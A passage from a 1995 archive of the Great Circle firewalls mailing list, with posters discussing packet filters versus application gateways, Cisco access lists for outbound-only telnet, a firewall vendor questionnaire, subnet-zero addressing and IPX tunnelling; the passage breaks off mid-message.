having a router outside (public side) of my firewall gateway proxy host machine (fgph). The router filters out incoming packets unless they are SMTP (it acts as a packet filter), thus helping me implement our security policy of "no incoming except SMTP." This makes it harder to attempt to crack my fgph. I did not implement both functions on the same machine, partly because the fgph I bought does not provide packet filtering, partly because I like the division of labor. If my router is compromised (hard, with no interaction permitted except from the console port) I still have my fpgh. If my fgph is not quite right it is still protected from outside attacks. dharris@kcp.com Delmer D. Harris "I talk to the trees, but they don't listen to me" even though I speak for myself, not my employer. ______________________________ Reply Separator _________________________________ Subject: Re: Firewall1 Comparison -Reply Author: Doug Kaye at KCD-SMTP Date: 10/13/95 8:34 I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make sense to implement both? Is it too expensive or overkill? If you implement both , where does the filter go -- on the public side of the application gateway? Is it possi ble to run both on the same hardware? ============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com From firewalls-owner Fri Oct 13 15:20:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA16025 for firewalls-outgoing; Fri, 13 Oct 1995 14:59:54 -0700 Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA16016 for ; Fri, 13 Oct 1995 14:59:51 -0700 Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id QAA02944; Fri, 13 Oct 1995 16:52:12 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma002922; Fri Oct 13 16:51:59 1995 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA24531 (5.67b/IDA-1.5); Fri, 13 Oct 1995 17:02:59 -0500 Date: Fri, 13 Oct 1995 17:02:59 -0500 From: Ken Hardy Message-Id: <199510132202.AA24531@ignatz.bridge.com> To: steveg@cseic.saic.com Subject: Re: Various FTPs Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [I've been working on this response most of the afternoon between lengthy disruptions -- it's probably not worth the wait. ;-) ] "Stephen H. Goldstein" wrote: >Question 1: >I'm curious as to why one would even bother with modifying FTP to use a >different port. If it's so bad, why not serve up your files via Gopher >or HTTP? Are they worse? As a user, I prefer HTTP to FTP when fetching things. But what are the system ramifications; how does HTTP compare to FTP & it's implementations in terms of system resources for a large site? Being stateless, its require a new TCP connection for each click, and current implementations spawn a separate process for each connection. FTP requires a new connection everytime you send a new directory listing back, doesn't it? Also, don't know how current HTTP server implementations can control the load on a server ala some ftpd's user limits. What I do like about FTP for a loaded site is that, once you get a connection, it's yours 'till you log off. With a load-throttled httpd disallowing 4 out of 5 of your connection attempts, it would be a lot harder to navigate a site, which is why I don't use my browser's built-in FTP for popular servers. HTTP might do for an outgoing-only anonymous FTP replacement. But HTTP is unidirectional; I can set up an FTP server to allow people to send me files, but not so with HTTP, and I can configure an FTP server to change the modes on received files so that even the sender cannot access them again. Anyone could conceivably fetch the file off my friend's HTTP server meant for me, passwords notwithstanding. >Question 2: >Assuming that in the interest of protecting themselves everyone mods >their FTP servers using approaches similar to IWI and Microsoft, how >much risk to systems on the client side is added by loosening filters >to compensate? I'm looking forward to others' analysis of this. Seems that HTTP ought to be able to pretty secure, esp. if you'd only allow GET methods and code against buffer overruns in the URLs. If you want to use non-anon passwords, it doesn't require any sort of actual account on the machine, and is slightly (_very_ slightly; hardly worth mentioning) more secure in that the passwords are not entirely plaintext, ala FTP. What sort of protocol-level shenanigans are possible, though? And to what degree does SSL &c. mitigate the problems? -KH (Don't know squat about gopher and am waiting for others to comment.) From firewalls-owner Fri Oct 13 15:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15835 for firewalls-outgoing; Fri, 13 Oct 1995 14:51:13 -0700 Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA15828 for ; Fri, 13 Oct 1995 14:51:09 -0700 Received: by wabash.iac.net id RAA09521; Fri, 13 Oct 1995 17:48:54 -0400 Date: Fri, 13 Oct 1995 17:48:52 -0400 (EDT) From: Carl Jolley To: Alan Hannan cc: Frederick M Avolio , firewalls@GreatCircle.COM Subject: Re: Firewall1 Comparison In-Reply-To: <199510131538.KAA17838@gaijin.mid.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 13 Oct 1995, Alan Hannan wrote: > ......... Frederick M Avolio is rumored to have said: > ] > ] >>Application gateways are more secure. > ] > > ] >This statement is perhaps too strong. > ] > ] Indeed, I am being dogmatic, in my loveable way. :-) > > Indeed, though we may argue on adverbs. > > IMHO saying Application Gateways are more secure is a very true > statement. How about this one? "Adding more services makes one > more likely to have security problems", or "A policy of that which > is not allowed is denied is more secure than a policy of that which > is not disallowed is allowed." > > While I can find a secure firewall that has more more services > than an insecure one in _general_ the rule is true. Likewise, a > firewall with 'not allowed denied' is not necessarily more secure > than a firewall with 'not denied allowed'. > You are correct about "not necessarily more secure" however if you agree that any mechanism that is set up by a human is subject to human errors, I believe that 'not denied allowed' would tend to fall victim to errors of omission, i.e. someone did not realise that a certain service, certain port, etc. was dangerous so they did not disallow it. I believe that the concept of 'not allowed denied' is safer because it requires a positive action to allow something rather than rely on the people who are configuring software/hardware to know everything AND remember everything when they are doing it. That certainly does not mean that someone could not decide to allow or permit as service that, in consideration for their security policy, they should not have. It does mean however that "I forgot" becomes a much less acceptable excuse. I believe it's always easier to hold someone accountable for what they did do rather than for what they did not do. The population of the choices of the former tends to be limited and finite while the pouplation of the choices of the later tend to the infinite. I believe that which side of this question one comes down on is indicative of one's general approach to security or, said another way, one's level of paranoia. From the standpoint of an organizational or corporate perspective the answer to this question probably is heavily coorelated to how valuable the "family jewels" are. > My point, dealing with the packet in and of itself, as opposed to > based upon the mac/tcp/ip/udp headers is significantly more > secure, generally speaking. > -- > Alan Hannan http://www.mid.net/~alan 402/472-0239 > Network Systems/Security Administrator MIDnet, Inc. > **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Fri Oct 13 16:31:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17355 for firewalls-outgoing; Fri, 13 Oct 1995 16:18:42 -0700 Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA17348 for ; Fri, 13 Oct 1995 16:18:39 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0t3tLJ-000iD8C; Fri, 13 Oct 95 19:16 EDT Date: Fri, 13 Oct 1995 19:16:45 -0400 (EDT) From: Adam Safier To: Firewalls@GreatCircle.COM cc: yg@muturl.planet-int.net Subject: Re: Firewalls-Digest V4 #586 In-Reply-To: <199510120316.UAA22448@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We do lots of OSPF routing with variable size subnets and I never lost a subnet. Adam S. > > From: Yannick Gravel > But, some are saying that I can use all subnet; but others are > saying that we lose the first and last subnet... > > System administrator -- yannick.gravel@planet-int.net > From firewalls-owner Fri Oct 13 16:43:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17326 for firewalls-outgoing; Fri, 13 Oct 1995 16:16:50 -0700 Received: from teal.csn.net (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA17319 for ; Fri, 13 Oct 1995 16:16:45 -0700 Received: (from surguine@localhost) by teal.csn.net (8.6.12/8.6.9) id QAA11994; Fri, 13 Oct 1995 16:30:50 -0600 Date: Fri, 13 Oct 1995 16:30:50 -0600 From: Scott Surguine Message-Id: <199510132230.QAA11994@teal.csn.net> To: firewalls@greatcircle.com Subject: Question: Telnet & Packet Filtering Cc: surguine@teal.csn.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Folks, I am trying to build a packet filter on a Cisco 2501 running IOS 10.2: I would like to allow telnet OUTGOING ONLY accross the Cisco. Which is the best way to accomplish this? I) Scenarion #1 interface serial0 ip address XXX.XXX.XXX.XX XXX.XXX,XXX.X ip access-group 100 in access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255 established II) Scenario #2 interface serial0 ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X ip access-group 100 in access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255 gt 1023 established What is confusing me is this: I have mainly in the past only used router platforms that filtered on the outgoing interface. I believe the second Scenario to be the better of the two but would prefer a second opinion. My *humble* Thanks, Scott Surguine surguine@csn.net From firewalls-owner Fri Oct 13 17:00:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA18060 for firewalls-outgoing; Fri, 13 Oct 1995 16:56:08 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA18053 for ; Fri, 13 Oct 1995 16:55:57 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id QAA04443; Fri, 13 Oct 1995 16:53:59 -0700 From: Paul Ferguson Message-Id: <199510132353.QAA04443@lint.cisco.com> Subject: Re: Firewall1 Comparison To: sacherich@ppg.com (Sacherich, Larry) Date: Fri, 13 Oct 95 16:53:59 PDT Cc: firewalls@GreatCircle.COM, wherrman@strong-funds.com In-Reply-To: <199510131532.AA08563@gateway.ppg.com>; from "Sacherich, Larry" at Oct 13, 95 11:25 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Again, this is a purely subjective issue. I would suggest to you, however, that application gateways (proxies) used in conjunction _with_ packet filtering is even more effective. - paul > > Walt, > > Every security book or white paper that I have read indicates > that an application level gateway is the best form of security. > I goes a step beyond just packet filtering. You would be well > advised to at least talk to firewall vendors like ANS, TIS, and > Boarderware. > > ANS 800-456-8267 info@ans.net http://www.ans.net/ > TIS 301-854-6889 avolio@tis.com http://www.tis.com/ > Net- 800-723-1166 sales@netpart.com http://www.netpart.com > Partners > > > Larry Sacherich > sacherich@ppg.com > > Comments are my personal opinion, and not that of PPG Industries. > -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Fri Oct 13 17:43:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA19013 for firewalls-outgoing; Fri, 13 Oct 1995 17:32:48 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA19004 for ; Fri, 13 Oct 1995 17:32:44 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id RAA11440; Fri, 13 Oct 1995 17:29:43 -0700 From: Paul Ferguson Message-Id: <199510140029.RAA11440@lint.cisco.com> Subject: Re: Question: Telnet & Packet Filtering To: surguine@csn.net (Scott Surguine) Date: Fri, 13 Oct 95 17:29:42 PDT Cc: firewalls@GreatCircle.COM, surguine@teal.csn.net In-Reply-To: <199510132230.QAA11994@teal.csn.net>; from "Scott Surguine" at Oct 13, 95 4:30 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Do you _really_ want to block _all_ incoming traffic? Half of your services, figuratively speaking, will cease to function if you do so. Example(s): o Do you rely on a service provider for secondary DNS? If yes, then you'll need to leave tcp/53 incoming open for zone transfers. o Do run FTP in PASV mode? If not, then you'll need to allow tcp ports > 1023 open for FTP connection back-channel data streams. o Do you expect to recieve e-mail? If so, then you'll need to allow tcp/25 to your mail host(s). There are several other examples, but hopefully you see the point I am trying to make. Make sure this is _exactly_ what you want to do before you actually do it. - paul > > I am trying to build a packet filter on a Cisco 2501 running IOS 10.2: > > I would like to allow telnet OUTGOING ONLY accross the Cisco. Which is > the best way to accomplish this? > > I) Scenarion #1 > > interface serial0 > ip address XXX.XXX.XXX.XX XXX.XXX,XXX.X > ip access-group 100 in > > access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255 > established > > II) Scenario #2 > > interface serial0 > ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X > ip access-group 100 in > > access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255 > gt 1023 established > > What is confusing me is this: I have mainly in the past only used > router platforms that filtered on the outgoing interface. I believe > the second Scenario to be the better of the two but would prefer > a second opinion. > -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Fri Oct 13 18:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA19354 for firewalls-outgoing; Fri, 13 Oct 1995 17:45:44 -0700 Received: from rugrat.glyphic.com (ns.glyphic.com [205.164.126.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA19347 for ; Fri, 13 Oct 1995 17:45:41 -0700 Received: from [205.164.126.163] by rugrat.glyphic.com with smtp (Smail3.1.28.1 #1) id m0t3ugX-000H9qC; Fri, 13 Oct 95 17:42 PDT X-Sender: markl@rugrat.glyphic.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 17:45:31 -0700 To: Scott Surguine From: markl@glyphic.com (Mark Lentczner) Subject: Re: Question: Telnet & Packet Filtering Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I would like to allow telnet OUTGOING ONLY accross the Cisco. Which is >the best way to accomplish this? >What is confusing me is this: I have mainly in the past only used >router platforms that filtered on the outgoing interface. The Cisco can filter both incoming and outgoing packets according to different access-lists. And you need to do both to make things really secure. You could use: interface serial0 ip address X.X.X.X m.m.m.m ip access-group 100 out ip access-group 101 in access-list 100 permit tcp x.x.x.x m.m.m.m gt 1023 0.0.0.0 255.255.255.255 eq 23 access-list 101 permit tcp 0.0.0.0 255.255.255.255 eq 23 x.x.x.x m.m.m.m gt 1023 established The restriction on return packets coming FROM port 23 is sort of pointless: You have no control over what ports hackers can use on their machines out on the Internet. They can easily send you packets originating from port 23. So the incoming filter might as well be: access-list 101 permit tcp 0.0.0.0 255.255.255.255 x.x.x.x m.m.m.m gt 1023 established This will also mean that your incoming filter will work for most future protocols you decide to allow your users to use (such as http). If you believe that the kernels on the x.x.x.x machines will properly reject packets for non-open connections (packets for which the ACK is set, but no connection has been made) (a reasonable assumption - Wizards: what do you think?), then you can simplify the incoming access list: access-list 101 permit tcp 0.0.0.0 255.255.255.255 x.x.x.x m.m.m.m established However, I like the gt 1023 rule, as it ensures that nothing from the outside can reach any servers accidentally running on x.x.x.x machines no matter what the kernel or hacker does. (Servers that use ports less than 1023 that is: I also treat port 6000 the same way.) Technically, you don't need assume that the outgoing port will be greater than 1023: it is concievable that some kernel implementation would allow client connections on ports lower than 1023 (it is configurable in Sun kernels!). After all, if your machine is making the outgoing connection, why do you care what port number it is? So you could simplify: access-list 100 permit tcp x.x.x.x m.m.m.m 0.0.0.0 255.255.255.255 eq 23 Taking that a step further, you could allow anyone on x.x.x.x to connect to any service they wanted: access-list 100 permit tcp x.x.x.x m.m.m.m 0.0.0.0 255.255.255.255 It all depends on what your security policy is. These variants open more opportunity for your x.x.x.x users, but they might be able to wreak more havoc this way too! You also might be concerned about limiting the abilities of the x.x.x.x machines lest they get broken into. Again - formulate your security policy and let it be your guide to desiging your filter. - Mark L. From firewalls-owner Fri Oct 13 19:03:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA21259 for firewalls-outgoing; Fri, 13 Oct 1995 18:44:09 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA21240 for ; Fri, 13 Oct 1995 18:44:01 -0700 Received: from fepco.com by relay1.UU.NET with SMTP id QQzlis02950; Fri, 13 Oct 1995 21:42:11 -0400 (EDT) Received: from ryahda.fepco.com by fepco.com (4.1/SMI-4.1) id AA16556; Fri, 13 Oct 95 18:51:14 MST Received: by ryahda.fepco.com (5.x/SMI-SVR4) id AA20061; Fri, 13 Oct 1995 18:38:59 -0700 Date: Fri, 13 Oct 1995 18:38:59 -0700 From: fepotts@fepco.com (Fred E Potts) Message-Id: <9510140138.AA20061@ryahda.fepco.com> To: dkaye@rds.com Subject: Re: Firewall1 Comparison -Reply Cc: Firewalls@GreatCircle.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Doug, My thinking on this subject is that the best way to set up a firewall system is: 0. CSU/DSU 1. Filtering Gateway (packet filter router) 2. Application Gateway. 3. Harden the interior machines on an individual basis as much as possible (large shops will have problems with this because of ``social considerations''). This type of setup is commonly known as a ``Screened Host Gateway,'' and is considered to be reasonably secure. It is, of course, a ``Bastion Host'' combined with a ``Filtering Gateway'' (packet filter). The hardware configuration would be your router (something like a Cisco), then a separate dedicated machine for the Application Gateway (firewall), then your internal network. As to whether this type of setup is overkill or not, that depends on your attitude and considerations of company data, reputation, and time and expense to rebuild your network in case of a breakin. As to price, this type of system runs about $15K plus about $120 a month for software upgrades. (Good computer systems are like airplanes -- they don't come cheap.) Regards... Fred __ fepotts@fepco.com http://www.fepco.com/ ----- Begin Included Message ----- From: Doug Kaye Date: Fri, 13 Oct 1995 08:34:21 -0700 Subject: Re: Firewall1 Comparison -Reply I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make sense to implement both? Is it too expensive or overkill? If you implement both, where does the filter go -- on the public side of the application gateway? Is it possible to run both on the same hardware? ============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com ----- End Included Message ----- From firewalls-owner Fri Oct 13 20:30:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA23233 for firewalls-outgoing; Fri, 13 Oct 1995 20:24:22 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA23226 for ; Fri, 13 Oct 1995 20:24:19 -0700 Received: from pm2-08.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA16471; Fri, 13 Oct 95 22:22:43 -0400 Date: Fri, 13 Oct 95 22:22:43 -0400 Message-Id: <9510140222.AA16471@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: gblolmxb@ibmmail.com From: frankw@in.net (Frank Willoughby) Subject: Re: Firewall Questionnaire Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark, Good beginning to your firewall questionnaire. FWIW, I have one which is about @250-300 lines long (each line is a separate evaluation item). It is a re-creation of a firewall evaluation checklist I made when I evaluated all of the major players in the firewall arena. To get a copy, feel free to e-mail me or (preferably) call me at: (317) 573-0800. Best Regards, Frank > > I am looking at possible commercial firewall products as my employer > may be getting a direct Internet connection soon. In order to help the > selection process, I have sent a list of questions to several > manufactures and suppliers, which I list below, does anyone think Ive > missed anything out? > > > > It is expected that XXXXX would want to offer the following services > to its employees: > > WWW access, FTP gets, outward bound Telnet, feed for an internal > Newsgroup server. > > Please note that electronic mail (SMTP) is not desired - this is > fulfilled via other channels. This raises the issue of a DNS - this > has not yet been resolved, XXXX may look to the Internet Provider to > supply this service. > > > QUESTIONNAIRE > > > 1. Would you describe your product as a: > a. A circuit firewall? > b. An application firewall? > c. A hybrid of the above? > d. Something else (please elaborate)? > > 2. Is your firewall a: > a. Software only solution? > b. A hardware and software solution? > c. Something else (please elaborate)? > > 3. On what hardware platform does your firewall run on? > > 4. What operating system does your firewall run on? > > 5. What physical network topology does the hardware support: > a. Ethernet? > b. Token ring? > c. Something else (please elaborate)? > > 6. How is the firewall managed/configured? (e.g. by use of telnet, > serial port etc.) > > 7. What sort of user interface is used to manage the firewall? > > XXXXX would want to deny access to many of the TCP and UDP protocol > suite at the router using packet filtering. If this were not possible, > the following protocols should be denied access by the firewall. > Please indicate, for each protocol, whether this is possible, and > whether the firewall itself will respond to them (e.g. incoming > Telnet). > > 8. ICMP > > 9. RIP. > > 10. SMTP. > > 11. Incoming Telnet. > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > 12. All incoming RPC type protocols (NFS, NIS) > > 13. TFTP. > > 14. FTP (incoming). > > 15. all 'r' commands. > > 16. MBone and other IP over IP protocols. > > 17 X11. > > 18. is a 'sanitised' version of finger supported? > > 19. Is there a proxy service for FTP? > > 20 Is there a proxy service for Telnet? > > 21. Is there a proxy service for NNTP? > > 22. Is there a proxy service for HTTP? > > 23. What sort of bandwidth of Internet connection can your firewall > handle? > > 24. How many concurrent IP circuits can your product handle? > > 25. XXXX operates on a commercial basis internally, and may wish to > charge departments and users for their usage. Does you product have > this facility built-in? > > 26. How does your product react to potential security breaches? > > 27. Does your Firewall assist in preventing outward bound misuse? > > 28. Do you offer security consultancy? If so, at what cost? > > 29. Do you have any reference sites whom XXXX may contact in the > future? > > 30. What would a suitable solution cost, assuming a 64Kbps leased line > connection? What sort of maintenance and support is offered and at > what cost? > > 31. Do you have any independent evaluations (e.g. Magazine review) of > your product? > > 32. Is there anything else you wish to tell us about your firewall > product(s)? > > > Mark. > > > From firewalls-owner Fri Oct 13 21:43:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24499 for firewalls-outgoing; Fri, 13 Oct 1995 21:36:24 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA24490 for ; Fri, 13 Oct 1995 21:36:21 -0700 Received: from pm4-13.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA18815; Fri, 13 Oct 95 23:34:41 -0400 Date: Fri, 13 Oct 95 23:34:41 -0400 Message-Id: <9510140334.AA18815@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Doug Kaye From: frankw@in.net (Frank Willoughby) Subject: Re: Firewall1 Comparison -Reply Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make >sense to implement both? Yes >Is it too expensive or overkill? Neither If you implement both, where >does the filter go -- on the public side of the application gateway? Explanation follows Is it possible to run both >on the same hardware? > Yes A Packet Filter can be as cheap as a little over a grand. Many are routers (Cisco is a good example of a high-quality router). An Application Gateway filters packets and applications (simply stated for brevity). Having managed a Packet Filter (not a router) *and* an Application Gateway, I guess I can say I speak from experience. FWIW, the Packet Filter was a DSG (Digital Security Gateway). Packet filters are good cheap fixes for low-risk security environments. Application Gateways are ideal for high-risk environments. If you are securing two internal LAN segments, the packet filter may be the best approach for you. I would consider the Internet to be a very high risk environment. There are many good packet filters out there. However, I'm a firm believer in using the right tool for the right job. IMO, the only firewall I would use for protecting valuable data from the Internet is an Application Gateway which uses heavy authentication and very strong encryption. The above assumes of course that you are trying to protect valuable data or your corporation. RE: Configuration question Regarding the configuration question, I personally would have the router on the Internet side be set up so that it only allows services which the firewall will pass judgement on and block everything else. This has the advantages of redundant security in the event that someone makes a mistake in the rules of the firewall or the router - and - it reduces the load on the firewall (increasing throughput). Of course, the router on the inside could also include these rules for even more redundant security. Rathole avoidance suggestion Also, rather than go down the road of Packet Filter vs. Application Gateway, please feel free to send me mail & we can discuss this subject off-line. If you want to research the subject further, I will be happy to supply you with references. Best Regards, Frank PS - FWIW, I agree completely with Fred from TIS. >============================================================ >Doug Kaye Rational Data Systems, Novato, CA >Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com > > > > > From firewalls-owner Sat Oct 14 08:30:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01564 for firewalls-outgoing; Sat, 14 Oct 1995 08:24:51 -0700 Received: from ic.net (falcon.ic.net [152.160.101.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA01557 for ; Sat, 14 Oct 1995 08:24:48 -0700 Received: by ic.net (Smail3.1.28.1 #6) id m0t48QK-000ghlC; Sat, 14 Oct 95 11:22 WET DST Date: Sat, 14 Oct 1995 11:22:56 -0400 (EDT) From: Mark Bell To: Yannick Gravel cc: firewalls@greatcircle.com Subject: Re: First and last subnet ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The subnet value - that is the portion of the address that is reserved for the subnet - cannot be all ones or all zeroes. i.e net address 135.148. 0.0 default netmask 255.255. 0.0 (class B) subnet mask 0. 0.255.0 ------------- netmask 255.255.255.0 The third byte cannot be 'all ones' or 'all zeroes'(referring to the binary subnet value - in this case whats in the 3rd byte). 255 (decimal) = 1111 1111 (binary), and obviously 0 (decimal) = 0000 0000 (binary) The subnets 135.148.255.0 and 135.148.0.0 cannot be used. If you have a cisco router, you may use the 135.148.0.0 subnet, if you set the 'subnet zero' parameter - see the manual - but note that other routers on the network may not forward the traffic to 135.148.0.0 if they have a subnet mask of 255.255.255.0 set for that net. The cause of the problem is RFC950, (subnetting ip networks) which was written in the days when net addresses were plentiful. If you have a class C address - say 198.143.35.0, and you subnet with a netmask of 255.255.255.192 (0xff.ff.ff.c0), you theoretically have the following subnets available: 198.143.35.0 198.143.35.64 198.143.35.128 198.143.35.192 Without the 'subnet zero' feature, subnets 198.143.35.0 and 198.143.35.192 cannot be used. You just lost 50% of the address space. Another feature of IP! There are other routers with the 'subnet zero' feature available, but I don't have a list available. Hope this helps. Mark Marol Consulting On Wed, 11 Oct 1995, Yannick Gravel wrote: > Hi Net&Sys Security poeples, > > Something that everybody is talking about, but not everybody > is saying the same thing about subnetting: > > Yes, everybody agree that we lose the first and last host of > each subnet for net.iding and broadcasting. > > But, some are saying that I can use all subnet; but others are > saying that we lose the first and last subnet... > > Whom truth is true.. > > Thanks.. > > Yannick Gravel > System administrator -- yannick.gravel@planet-int.net > From firewalls-owner Sat Oct 14 09:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01733 for firewalls-outgoing; Sat, 14 Oct 1995 08:47:29 -0700 Received: from ic.net (falcon.ic.net [152.160.101.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA01726 for ; Sat, 14 Oct 1995 08:47:26 -0700 Received: by ic.net (Smail3.1.28.1 #6) id m0t48dD-000ghnC; Sat, 14 Oct 95 11:36 WET DST Date: Sat, 14 Oct 1995 11:36:15 -0400 (EDT) From: Mark Bell To: Danny Cox cc: firewalls@greatcircle.com Subject: Re: Modems and IPX tunnelling In-Reply-To: <6373.9510131028@gmap.leeds.ac.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would suggest that you do your ipx tunnelling outside the firewall - put your Netware Server between the firewall router and your provider's router (DMZ). Allow IPX through the firewall router and block it through the provider's router. Allow IP/UDP and IP/TCP through the provider's router and block IP/UDP through the firewall router. Should be safe enough.... Mark Marol Consulting On Fri, 13 Oct 1995, Danny Cox wrote: > Ok .. things are clarifying further for me. I understand that in order > to use Novell's IPX tunnelling within IP it has to be run using UDP. > > Given general attitudes towards UDP through firewalls I'm a little > troubled by this. Would the general concensus here be to not do it? > Would there be easy ways of improving this ? eg have some proxyish sort of > thing which accepts UDP and squirts out TCP for passing thro' the fw? > > Furthermore .. what are the implications of letting IPX through. Should > this traffic be filtered in anyway ? If it makes any difference, and I'm > not at all convinced it does, our plan will be to run it through modems > and/or ISDN. I guess that will have to go through some sort of Terminal > Server. I suppose if we do let IPX through like this, then we could > effectively use the Internet as our connection medium for an IPX based > VPN?? Actually, thinking on .. we plan to connect our LANs between this > site and our new one using Kilostream links. We'll use ISDN as a backup. > I think there are thoughts about using a product by Novell - I forget its > name. I suspect that won't combine with the firewall too well. So my > idea would be to firewall the lot and, as I say, tunnel the IPX through > it. > > Any comments ? > Thanks .. Danny > From firewalls-owner Sat Oct 14 10:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA02678 for firewalls-outgoing; Sat, 14 Oct 1995 10:22:22 -0700 Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA02671 for ; Sat, 14 Oct 1995 10:22:17 -0700 Received: by wabash.iac.net id NAA14503; Sat, 14 Oct 1995 13:17:19 -0400 Date: Sat, 14 Oct 1995 13:16:59 -0400 (EDT) From: Carl Jolley To: Danny Cox cc: firewalls@GreatCircle.COM Subject: Re: Modems and IPX tunnelling In-Reply-To: <6373.9510131028@gmap.leeds.ac.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 13 Oct 1995, Danny Cox wrote: > Ok .. things are clarifying further for me. I understand that in order > to use Novell's IPX tunnelling within IP it has to 